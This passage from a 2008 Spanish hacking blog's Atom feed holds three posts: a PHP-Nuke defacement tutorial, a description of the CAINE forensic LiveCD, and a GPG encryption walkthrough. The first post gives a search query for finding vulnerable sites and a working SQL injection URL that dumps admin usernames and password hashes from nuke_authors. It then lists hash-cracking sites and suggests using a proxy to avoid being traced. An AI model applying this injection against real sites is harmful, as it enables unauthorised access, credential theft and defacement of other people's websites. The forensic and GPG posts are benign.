y puede que esta contenga la pass.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;	2.- Al tema con SQL injection!&lt;br /&gt;&lt;br /&gt;	El ataque que voy a enseñar es uno de los mas sencillos de hacer. Solo demostrare como encontrar una pagina vulnerable y como sacar la información de esta. Una vez tengas la información tendras que jugar con tu cerebro para hacerle lo que quieras a la pagina.&lt;br /&gt;&lt;br /&gt;	Lo primer que tenemos que hacer es buscar una web vulnerable a SQL injection, bien pues vamos a el buscador de yahoo:&lt;br /&gt;&lt;br /&gt;			http://es.search.yahoo.com/web?fr=yfp-t-501&lt;br /&gt;&lt;br /&gt;	Y una vez dentro buscamos con el siguiente codigo:&lt;br /&gt;&lt;br /&gt;			modules.php?name=Statistics Version PHP-Nuke&lt;br /&gt;&lt;br /&gt;	Al darle a buscar nos apareceran paginas en PHP nuke que son las vulnerables al ataque que vamos a realizar ahora, pero no desespereis muchas están solucinadas.&lt;br /&gt;&lt;br /&gt;	Lo siguiente es probar haber si la pagina que estamos visitando es vulnerable, para ello insertamos en la url lo siguiente:&lt;br /&gt;&lt;br /&gt;modules.php?name=Search&amp;type=comments&amp;%20%20%20query=&amp;%20%20%20query=loquesea&amp;instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors&lt;br /&gt;&lt;br /&gt;	de tal forma que si la url es:&lt;br /&gt;&lt;br /&gt;	www.webvul.com/modules.php?=&lt;br /&gt;&lt;br /&gt;	quedaria de esta forma:&lt;br /&gt;&lt;br /&gt;	www.webvul.com/modules.php?name=Search&amp;type=comments&amp;%20%20%20query=&amp;%20%20%20query=loquesea&amp;instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors&lt;br /&gt;&lt;br /&gt;	Si la web es vulnerable te dará el nombre de los usuarios y la contraseña en MD5.&lt;br /&gt;&lt;br /&gt;	Por ultimo solo tenemos que ir a un crackeado de MD5 para buscar la contraseña, por ejemplo:&lt;br /&gt;&lt;br /&gt;	http://md5.rednoize.com/&lt;br /&gt;	http://passcracking.com/index.php&lt;br /&gt;	http://www.milw0rm.com/cracker/info.php&lt;br /&gt;	http://www.xmd5.net/index_en.htm&lt;br /&gt;	http://shm.hard-core.pl/md5/&lt;br /&gt;	http://www.csthis.com/md5/index.php&lt;br /&gt;	http://gdataonline.com/&lt;br /&gt;	http://md5.benramsey.com/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;	Una vez tengamos el nombre de usuario y la contraseña crackeada solo tenemos que loguearnos en la pagina como ese usuario y hacer volar nuestra imaginación.&lt;br /&gt;&lt;br /&gt;	Aviso: Utilizar un proxy antes de hacer estos ataques y una pista los usuarios administradores o el usuario administrador son los primeros de la lista :)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;	3.-Proteger nuestra pagina de ataques SQL injection&lt;br /&gt;	&lt;br /&gt;	Como siempre os pongo la opinión de un experto en materia :), aquí os dejo la solución que da David Rodrigez sobre proteger la pagina ante estos tipos de ataques:&lt;br /&gt;&lt;br /&gt;	http://blogdavidrodriguez.piensaennaranja.com/2008/06/16/proteger-pagina-web-contra-sql-injection/&lt;br /&gt;&lt;br /&gt;	Y ya sabeis proteger vuestra pagina esta en vuestras manos pero el dañarla en la de los otros :)&lt;br /&gt;	&lt;br /&gt;	&lt;br /&gt;	&lt;br /&gt;&lt;br /&gt;	&lt;br /&gt;	4.-Despedida&lt;br /&gt;&lt;br /&gt;	Este tutorial os habra parecido mas soso que los anteriores pero la explicacíon es sencilla. Si haria un tutorial sobre SQL injection avanzado los que no sepan lenguaje SQL se perderian asi que les dejo un poco de tregua con este tutorial a la espera del fuerte :)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Fuentes:&lt;br /&gt;&lt;br /&gt; http://blogdavidrodriguez.piensaennaranja.com&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5908420914672444840-3251954327153053061?l=pirates-of-the-routers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pirates-of-the-routers.blogspot.com/feeds/3251954327153053061/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://pirates-of-the-routers.blogspot.com/2008/12/introduccin-defaces.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5908420914672444840/posts/default/3251954327153053061'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5908420914672444840/posts/default/3251954327153053061'/><link rel='alternate' type='text/html' href='http://pirates-of-the-routers.blogspot.com/2008/12/introduccin-defaces.html' title='Introducción Defaces'/><author><name>Pirates of the routers</name><uri>http://www.blogger.com/profile/15988587769671894053</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5908420914672444840.post-7358358073177849235</id><published>2008-12-17T11:51:00.000-08:00</published><updated>2008-12-17T12:04:33.777-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Linux'/><title type='text'>CAINE, LiveCD GNU/Linux para Informática Forense</title><content type='html'>CAINE (Computer Aided INvestigative Environment), es una distribución GNU/Linux en modo LiveCD creada por Giancarlo Giustini como un proyecto de Informática Forense (Forense Digital) para el Centro de Investigación en Seguridad (CRIS), con el apoyo de la Universidad de Modena y Reggio Emilia.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://img265.imageshack.us/img265/1733/logoei4.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 450px; height: 253px;" src="http://img265.imageshack.us/img265/1733/logoei4.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;El proyecto CAINE (Computer Aided INvestigative Environment) no pretende ser una nueva herramienta forense o framework de recopilación de ellas, pues este tipo de distribuciones ya existen (ej. Felix FCCU, Deft, entre otras). CAINE propone como novedad un nuevo entorno de fácil uso para todo este tipo de herramientas. Además introduce nuevas características importantes, que aspiran a llenar el vacio de interoperabilidad a través de diferentes herramientas forenses, ya que proporciona una interfaz gráfica homogénea que guía a los investigadores digitales durante la adquisición y el análisis de las pruebas electrónicas, y ofrece un proceso semi-automático durante la documentación y generación de informes y resultados.&lt;br /&gt;&lt;br /&gt;El proyecto CAINE proporciona al usuario las siguientes principales novedades:&lt;br /&gt;&lt;br /&gt;* Fácil interoperabilidad durante todo el análisis (Preservación, Recolección, Análisis, Reportes).&lt;br /&gt;* Amigable entorno gráfico.&lt;br /&gt;* Ubuntu como sistema base, ello implica un fácil uso y fácil instalación o adaptación sobre nuestro entorno de trabajo.&lt;br /&gt;* Generación semi-automática de reportes.&lt;br /&gt;&lt;br /&gt;Algunas herramientas incluídas:&lt;br /&gt;&lt;br /&gt;* Grissom Analyzer&lt;br /&gt;* Automated Image &amp;amp; Restore (AIR)&lt;br /&gt;* Guymager&lt;br /&gt;* Foremost and Scalpel&lt;br /&gt;* Autopsy 2.20 and TSK 3.0&lt;br /&gt;* SFDumper&lt;br /&gt;* Fundl&lt;br /&gt;* Stegdetect&lt;br /&gt;* Ophcrack&lt;br /&gt;&lt;br /&gt;Capturas de pantalla de CAINE (Computer Aided INvestigative Environment)&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://img399.imageshack.us/img399/9245/01cainebootpv2.th.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 150px; height: 122px;" src="http://img399.imageshack.us/img399/9245/01cainebootpv2.th.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://img384.imageshack.us/img384/6549/02caineboot2tk7.th.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 150px; height: 113px;" src="http://img384.imageshack.us/img384/6549/02caineboot2tk7.th.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://img237.imageshack.us/img237/3312/03caineguiia5.th.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 150px; height: 133px;" src="http://img237.imageshack.us/img237/3312/03caineguiia5.th.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://img237.imageshack.us/img237/5710/04cainegui2zq4.th.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 150px; height: 119px;" src="http://img237.imageshack.us/img237/5710/04cainegui2zq4.th.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://img370.imageshack.us/img370/8397/07cainescalpelcc0.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 355px; height: 418px;" src="http://img370.imageshack.us/img370/8397/07cainescalpelcc0.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.caine-live.net/en/index.html" target="_blank"&gt;Pagina Oficial del Proyecto&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://samba.ing.unimo.it/%7Egianchi/caine03_ENG.iso" target="_blank"&gt;descargar CAINE&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://174.36.1.2/caine.7z" target="_blank"&gt;Maquina Virtual desarrollada para VMware WorkStation o VMware Player&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5908420914672444840-7358358073177849235?l=pirates-of-the-routers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pirates-of-the-routers.blogspot.com/feeds/7358358073177849235/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://pirates-of-the-routers.blogspot.com/2008/12/caine-livecd-gnulinux-para-informtica.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5908420914672444840/posts/default/7358358073177849235'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5908420914672444840/posts/default/7358358073177849235'/><link rel='alternate' type='text/html' href='http://pirates-of-the-routers.blogspot.com/2008/12/caine-livecd-gnulinux-para-informtica.html' title='CAINE, LiveCD GNU/Linux para Informática Forense'/><author><name>Pirates of the routers</name><uri>http://www.blogger.com/profile/15988587769671894053</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5908420914672444840.post-3978819278344942497</id><published>2008-12-12T12:12:00.000-08:00</published><updated>2009-01-26T00:45:40.122-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Cifrado con GPG'/><title type='text'>Cifrado con GPG</title><content type='html'>&lt;div style="text-align: center;"&gt;&lt;span style="font-weight: bold; color: rgb(51, 255, 51);font-family:lucida grande;font-size:180%;"  &gt;CIFRADO CON GPG&lt;/span&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;br /&gt;creado por iLuN&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div style="text-align: left;"&gt;&lt;span style="font-weight: bold;font-size:85%;" &gt;Segun lo que dice nuestra querida wikipedia:&lt;/span&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;b&gt;GPG&lt;/b&gt; o &lt;b&gt;G&lt;/b&gt;NU &lt;b&gt;P&lt;/b&gt;rivacy &lt;b&gt;G&lt;/b&gt;uard es una herramienta para cifrado y &lt;/span&gt;&lt;span style="text-decoration: underline;font-size:85%;" &gt;firmas digitales&lt;/span&gt;&lt;span style="font-size:85%;"&gt;, que viene a ser un reemplazo del &lt;a href="http://es.wikipedia.org/wiki/PGP" title="PGP" class="mw-redirect"&gt;PGP&lt;/a&gt; (&lt;i&gt;Pretty Good Privacy&lt;/i&gt;) pero con la principal diferencia que es &lt;a href="http://es.wikipedia.org/wiki/Software_libre" title="Software libre"&gt;software libre&lt;/a&gt; licenciado bajo la &lt;a href="http://es.wikipedia.org/wiki/Licencia_p%C3%BAblica_general_de_GNU" title="Licencia pública general de GNU" class="mw-redirect"&gt;GPL&lt;/a&gt;. GPG utiliza el estándar del &lt;a href="http://es.wikipedia.org/wiki/IETF" title="IETF"&gt;IETF&lt;/a&gt; denominado &lt;a href="http://es.wikipedia.org/wiki/OpenPGP" title="OpenPGP" class="mw-redirect"&gt;OpenPGP&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;span style="font-size:85%;"&gt;GPG es estable, calificado como un software para el uso en producción y es comúnmente incluido en los sistemas operativos como &lt;a href="http://es.wikipedia.org/wiki/FreeBSD" title="FreeBSD"&gt;FreeBSD&lt;/a&gt;, &lt;a href="http://es.wikipedia.org/wiki/OpenBSD" title="OpenBSD"&gt;OpenBSD&lt;/a&gt;, &lt;a href="http://es.wikipedia.org/wiki/NetBSD" title="NetBSD"&gt;NetBSD&lt;/a&gt; y últimamente con todas las distribuciones &lt;a href="http://es.wikipedia.org/wiki/GNU/Linux" title="GNU/Linux"&gt;GNU/Linux&lt;/a&gt;.&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-size:85%;"&gt;Aunque básicamente el programa tiene una interfaz textual, actualmente hay varias aplicaciones gráficas que utilizan recursos de GPG.&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-size:85%;"&gt;GPG cifra los mensajes usando pares de claves individurales asimetricas generadas por los usuarios, es decir, utiliza el "metodo" de seguridad de clave publica y clave privada.&lt;/span&gt;&lt;/p&gt;&lt;span style="font-size:85%;"&gt;Una breve y no tan detallada explicación sería la siguiente:&lt;br /&gt;Si queremos que alguien lea un mensaje nuestro que hemos encriptado le tenemos que mandar nuestra clave publica, y el con nuestra clave publica y su privada desencriptada el mensaje que le hemos enviado.&lt;br /&gt;Esta explicación se entendra mas adelante con una demostración que presento a continuación.&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;span style="font-size:85%;"&gt;Despues de esta introducción sobre el GPG mostramos a continuación su uso en un equipo OpenSuSE 11.0 en el cual el programa ya viene incorporado.&lt;/span&gt;&lt;/p&gt;&lt;p style="color: rgb(204, 51, 204);"&gt;&lt;span style="font-size:85%;"&gt;1.- Creamos las claves publica y privada en nuestro equipo, para ello seguimos los siguientes pasos.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-size:85%;"&gt;Abrimos nuestra consola o shell y escribimos lo siguiente: (Estando como root)&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-size:85%;"&gt;#gpg --gen-key&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-weight: bold;font-size:85%;" &gt;SALE LO SIGUIENTE:&lt;/span&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-size:85%;"&gt;linux-nrop:/home/ilun # gpg --gen-key&lt;br /&gt;gpg (GnuPG) 2.0.9; Copyright (C) 2008 Free Software Foundation, Inc.&lt;br /&gt;This is free software: you are free to change and redistribute it.&lt;br /&gt;There is NO WARRANTY, to the extent permitted by law.&lt;br /&gt;&lt;br /&gt;Por favor seleccione tipo de clave deseado:&lt;br /&gt;(1) DSA y ElGamal (por defecto)&lt;br /&gt;(2) DSA (sólo firmar)&lt;br /&gt;(5) RSA (sólo firmar)&lt;br /&gt;Su elección:&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style="font-weight: bold;"&gt;&lt;span style="font-size:85%;"&gt;Usaremos la opción por defecto.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-size:85%;"&gt;Su elección: 1&lt;br /&gt;El par de claves DSA tendrá 1024 bits.&lt;br /&gt;las claves ELG pueden tener entre 1024 y 4096 bits de longitud.&lt;br /&gt;¿De qué tamaño quiere la clave? (2048)&lt;/span&gt;&lt;/p&gt;&lt;p style="text-align: left;"&gt;&lt;span style="font-weight: bold;font-size:85%;" &gt;Utilizaremos el tamaño por defecto&lt;/span&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: bold;font-size:85%;" &gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;span style="font-size:85%;"&gt;El tamaño requerido es de 2048 bits&lt;br /&gt;Por favor, especifique el período de validez de la clave.&lt;br /&gt;0 = la clave nunca caduca&lt;br /&gt;&lt;n&gt;  = la clave caduca en n días&lt;br /&gt;&lt;n&gt;w = la clave caduca en n semanas&lt;br /&gt;&lt;n&gt;m = la clave caduca en n meses&lt;br /&gt;&lt;n&gt;y = la clave caduca en n años&lt;br /&gt;¿Validez de la clave (0)?&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Elegiremos la opción de la clave nunca caduca&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;y decimos que es correcto.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;¿Validez de la clave (0)? 0&lt;br /&gt;La clave nunca caduca&lt;br /&gt;¿Es correcto? (s/n) s&lt;br /&gt;&lt;br /&gt;Necesita un identificador de usuario para identificar su clave. El programa&lt;br /&gt;construye el identificador a partir del Nombre Real, Comentario y Dirección&lt;br /&gt;de Correo Electrónico de esta forma:&lt;br /&gt;"Heinrich Heine (Der Dichter) &lt;heinrichh@duesseldorf.de&gt;"&lt;br /&gt;&lt;br /&gt;Nombre y apellidos:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Insertamos los datos que nos piden a continuación.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Nombre y apellidos: iLuNPr&lt;br /&gt;Dirección de correo electrónico: ilun.pr@gmail.com&lt;br /&gt;Comentario: Pirates Of The Routers&lt;br /&gt;Ha seleccionado este ID de usuario:&lt;br /&gt;"iLuNPr (Pirates Of The Routers) &lt;ilun.pr@gmail.com&gt;"&lt;br /&gt;¿Cambia (N)ombre, (C)omentario, (D)irección o (V)ale/(S)alir?&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Y por ultimo le damos a Vale (V)&lt;/span&gt;&lt;br /&gt;¿Cambia (N)ombre, (C)omentario, (D)irección o (V)ale/(S)alir? v&lt;br /&gt;Necesita una frase contraseña para proteger su clave secreta&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Ahora nos saldrá una pantalla donde pondremos nuestra clave privada... y aceptamos&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Es importante trabajar con el equipo, abriendo ventanas etc para que la clave coja un valor aleatorio como dirá&lt;/span&gt;&lt;span style="font-weight: bold;"&gt; a continuación.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Es necesario generar muchos bytes aleatorios. Es una buena idea realizar&lt;br /&gt;alguna otra tarea (trabajar en otra ventana/consola, mover el ratón, usar&lt;br /&gt;la red y los discos) durante la generación de números primos. Esto da al&lt;br /&gt;generador de números aleatorios mayor oportunidad de recoger suficiente&lt;br /&gt;entropía.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Una vez creada salran los datos correspondientes.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Para ver las claves que contenemos ponemos el siguiente comando:&lt;br /&gt;&lt;br /&gt;#gpg --list-keys&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;Y nos saldrá una lista de las claves creadas e importadas.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 153, 255);"&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;2.- Cifrar archivos&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(255, 255, 255);"&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;&lt;span style="color: rgb(255, 255, 255);"&gt;Para cifrar archivos ponemos el siguiente comando:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 255, 255);"&gt;#gpg -a -o [nombre_queramosNombre] -er [email] [archivo_a_cifrar]&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 255, 255);"&gt;Ejemplo:&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 255, 255);"&gt;linux-nrop:/home/ilun/cifrados # gpg -a -o passwd_crypted -er ilun.pr@gmail.com passwd&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 255, 255);"&gt;linux-nrop:/home/ilun/cifrados # ls&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 255, 255);"&gt;passwd  passwd_crypted&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(255, 255, 255);"&gt;Aqui tenemos el archivo passwd, que era el que queriamos encriptar y ahora se ha creado el archivo passwd_crypted que le hemos llamado así.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 255, 255);"&gt;Como es logico y normal borramos el archivo no encriptado...&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 255, 255);"&gt;Para ello:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;&lt;span style="color: rgb(255, 255, 255);"&gt;#rm passwd&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/ilun.pr@gmail.com&gt;&lt;/heinrichh@duesseldorf.de&gt;&lt;/n&gt;&lt;/n&gt;&lt;/n&gt;&lt;/n&gt;&lt;/span&gt;&lt;span style="color: rgb(255, 153, 255);font-size:85%;" &gt;&lt;span style="color: rgb(204, 51, 204);"&gt;3.- Descrifrar archivos&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;n&gt;&lt;n&gt;&lt;n&gt;&lt;n&gt;&lt;heinrichh@duesseldorf.de&gt;&lt;ilun.pr@gmail.com&gt;&lt;span style="color: rgb(255, 153, 255);"&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 255, 255);"&gt;Es tan facil como antes, solo tenemos que poner el siguiente comando:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 255, 255);"&gt;#gpg -a -o [como_queremosNombre] -d [archivo_cifrado]&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 255, 255);"&gt;Ejem:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span&gt;&lt;span style="color: rgb(255, 255, 255);"&gt;linux-nrop:/home/ilun/cifrados # gpg -a -o passwd_des -d passwd_crypted&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 255, 255);"&gt;gpg: cifrado con clave ELG de 2048 bits, ID D1795C00, creada el 2008-12-12&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 255, 255);"&gt;  "iLuNPr (Pirates Of The Routers) &lt;/span&gt;&lt;ilun.pr@gmail.com&gt;&lt;span style="color: rgb(255, 255, 255);"&gt;"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 255, 255);"&gt;linux-nrop:/home/ilun/cifrados # ls&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 255, 255);"&gt;passwd_crypted  passwd_des&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/ilun.pr@gmail.com&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/ilun.pr@gmail.com&gt;&lt;/heinrichh@duesseldorf.de&gt;&lt;/n&gt;&lt;/n&gt;&lt;/n&gt;&lt;/n&gt;&lt;/span&gt;&lt;span style="color: rgb(255, 153, 255);font-size:85%;" &gt;&lt;span style="color: rgb(204, 51, 204);"&gt;4.- Importar y exportar claves publicas&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;br /&gt;Para que puedan y poder desencriptar archivos se requiere de la clave publica del creador de ese archivo, por lo que en este apartado os enseñare a exportarla para pasarsela a alguien y como importar una que nos han pasado.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: bold;font-size:85%;" &gt;EXPORTAR:&lt;/span&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: bold;font-size:85%;" &gt;Ponemos el siguiente comando:&lt;br /&gt;&lt;br /&gt;#gpg -a -o [nombre_queremosNombre.asc] --export [UID]&lt;br /&gt;&lt;br /&gt;[UID]: El correo que hemos insertado en la configuracion del par de claves.&lt;br /&gt;&lt;br /&gt;Ejemplo:&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:85%;"&gt;linux-nrop:/home/ilun/cifrados # gpg -a -o pk.asc --export ilun.pr@gmail.com&lt;br /&gt;linux-nrop:/home/ilun/cifrados # ls&lt;br /&gt;passwd_crypted  passwd_des  pk.asc&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: bold;font-size:85%;" &gt;IMPORTAR:&lt;/span&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: bold;font-size:85%;" &gt;Ponemos el siguiente comando:&lt;/span&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: bold;font-size:85%;" &gt;#gpg --import [archivo.asc]&lt;br /&gt;&lt;br /&gt;Ejemplo:&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:85%;"&gt;#gpg --import compañero.asc&lt;/span&gt;&lt;span style="font-weight: bold;font-size:85%;" &gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="color: rgb(255, 153, 255);font-size:85%;" &gt;&lt;span style="color: rgb(204, 51, 204);"&gt;5.- Cifrar y descifrar para otros&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-weight: bold;font-size:85%;" &gt;CIFRAR:&lt;br /&gt;&lt;br /&gt;Ponemos el siguiente comando:&lt;br /&gt;&lt;br /&gt;#gpg -a -o [archivo_queremosNombre] -er [destinatario] [archivo_no_encriptado]&lt;br /&gt;&lt;br /&gt;[destinatario] : Ponemos el email de nuestro compañero, pero no significa que se lo vaya a enviar.&lt;br /&gt;&lt;br /&gt;Ejem: (tenemos que tener su clave publica antes)&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:85%;"&gt;linux-nrop:/home/ilun/cifrados # gpg -a -o amigos_encrypt -er amigo@hotmail.com amigos&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: bold;font-size:85%;" &gt;DESCIFRAR:&lt;br /&gt;&lt;br /&gt;Ponemos el siguiente comando:&lt;br /&gt;&lt;br /&gt;#gpg -a -o [archivo_queremosNombre] -d [archivo_encriptado]&lt;br /&gt;&lt;br /&gt;Ejem:&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:85%;"&gt;linux-nrop:/home/ilun/cifrados # gpg -a -o hola -d hola_crypted&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="color: rgb(204, 51, 204);font-size:85%;" &gt;USUARIOS DE WINDOWS&lt;/span&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;br /&gt;Aqui os dejo un link con un tutorial del GPG para windows.&lt;br /&gt;&lt;br /&gt;http://holait.blogspot.com/2008/06/manual-de-instalacin-y-uso-de-gpg4win.html&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="color: rgb(51, 255, 51);font-size:85%;" &gt;iLuN :)&lt;/span&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;n&gt;&lt;n&gt;&lt;n&gt;&lt;n&gt;&lt;heinrichh@duesseldorf.de&gt;&lt;ilun.pr@gmail.com&gt;&lt;span style="color: rgb(255, 153, 255);font-size:130%;" &gt;&lt;span style="color: rgb(204, 51, 204);"&gt;&lt;span style="font-size:85%;"&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;&lt;span&gt;&lt;ilun.pr@gmail.com&gt;&lt;br /&gt;&lt;/ilun.pr@gmail.com&gt;&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span 